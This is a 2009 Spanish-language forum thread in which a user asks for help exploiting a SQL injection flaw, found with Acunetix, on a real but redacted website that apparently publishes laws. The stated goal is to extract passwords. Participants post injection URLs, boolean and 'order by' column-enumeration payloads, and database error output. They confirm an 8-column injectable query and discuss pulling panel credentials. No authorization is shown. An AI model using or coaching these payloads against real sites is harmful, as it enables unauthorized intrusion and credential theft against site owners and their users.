|
Título: Inyeccion SQL, ¿es vulnerable esta web? Publicado por: y0mism0 en 28 Agosto 2009, 03:35 am Resulta que estaba escaneando una web con el acunetix y me salto esta supuesta vulnerablidad SQL en esta variable:
****/?op=Leyes&idBoletin=111-222-1933email@address.tst El servidor me da el siguiente mensaje de error: No se ha podido realizar la consulta: select * from leyes where id_publiOficial = 111-222-1933email@address.tst order by fecha desc; Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@address.tst order by fecha desc' at line 1 De hay solo saco que hay una tabla llamada leyes y una columna llamada oficina. Y ahora intento sacar las datos usando lo tipico, el having 1=1-- primero, dejando la url asi: ****/?op=Leyes&idBoletin=111-222-1933email@address.tst'having 1=1-- Dandome el mismo mensaje de error pero añadiendo lo del having: No se ha podido realizar la consulta: select * from leyes where id_publiOficial = 111-222-1933email@address.tst'having 1=1-- order by fecha desc; Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '@address.tst order by fecha desc' at line 1 Luego lo puse asi: ****/?op='having 1=1-- Y no me salio ningun mensaje de error... Tambien probe con 2 comillas, con otras instrucciones, ¿es este sitio vulnerable? ¿Tengo que meter el having de otra manera? Da mensajes de error, pero no te deja meter las comillas para hacer la inyeccion, las toma como un caracter mas me parece. Gracias Título: Re: Inyeccion SQL, ¿es vulnerable esta web? Publicado por: YST en 28 Agosto 2009, 04:10 am Prueba con
Código: +and+1=1+--+ Prueba con Código: '+and+1=1+--+ Título: Re: Inyeccion SQL, ¿es vulnerable esta web? Publicado por: WHK en 28 Agosto 2009, 04:23 am lo que pasa esque idBoletin contiene un valor incorrecto y por eso cada ves que haces pruebas con ese valor te arroja error.
Error: ***** index.php?op=InfoLey&idLey=6147 and 1=2 No da error: ***** index.php?op=InfoLey&idLey=6147 and 1=1 No da error ***** index.php?op=InfoLey&idLey=6147 order by 6 No da error ***** index.php?op=InfoLey&idLey=6147 order by 7 No da error ***** index.php?op=InfoLey&idLey=6147 order by 8 da error ***** index.php?op=InfoLey&idLey=6147 order by 9 Entonces es una tabla de 8 columnas que si tiene inyección sql. Título: Re: Inyeccion SQL, ¿es vulnerable esta web? Publicado por: y0mism0 en 30 Agosto 2009, 03:30 am lo que pasa esque idBoletin contiene un valor incorrecto y por eso cada ves que haces pruebas con ese valor te arroja error. Error: ***** index.php?op=InfoLey&idLey=6147 and 1=2 No da error: ***** index.php?op=InfoLey&idLey=6147 and 1=1 No da error ***** index.php?op=InfoLey&idLey=6147 order by 6 No da error ***** index.php?op=InfoLey&idLey=6147 order by 7 No da error ***** index.php?op=InfoLey&idLey=6147 order by 8 da error ***** index.php?op=InfoLey&idLey=6147 order by 9 Entonces es una tabla de 8 columnas que si tiene inyección sql. Pues en la variables esta: ****/?op=Leyes&idBoletin que yo te puse no funciona lo de 1=1 o 1=2 ni el order by... ¿pero como se puede hacer la inyeccion para sacar los pass? No te da errores que te vayan diciendo el nombre de las tablas ni los campos usando union select y todo eso. Título: Re: Inyeccion SQL, ¿es vulnerable esta web? Publicado por: YST en 30 Agosto 2009, 05:43 am La inyeccion para sacar claves de algun panel o algo varia según las tablas y columnas :P , tambien puede existir la posibilidad que no tenga en la MySQL los datos del login ;) .
Saludos |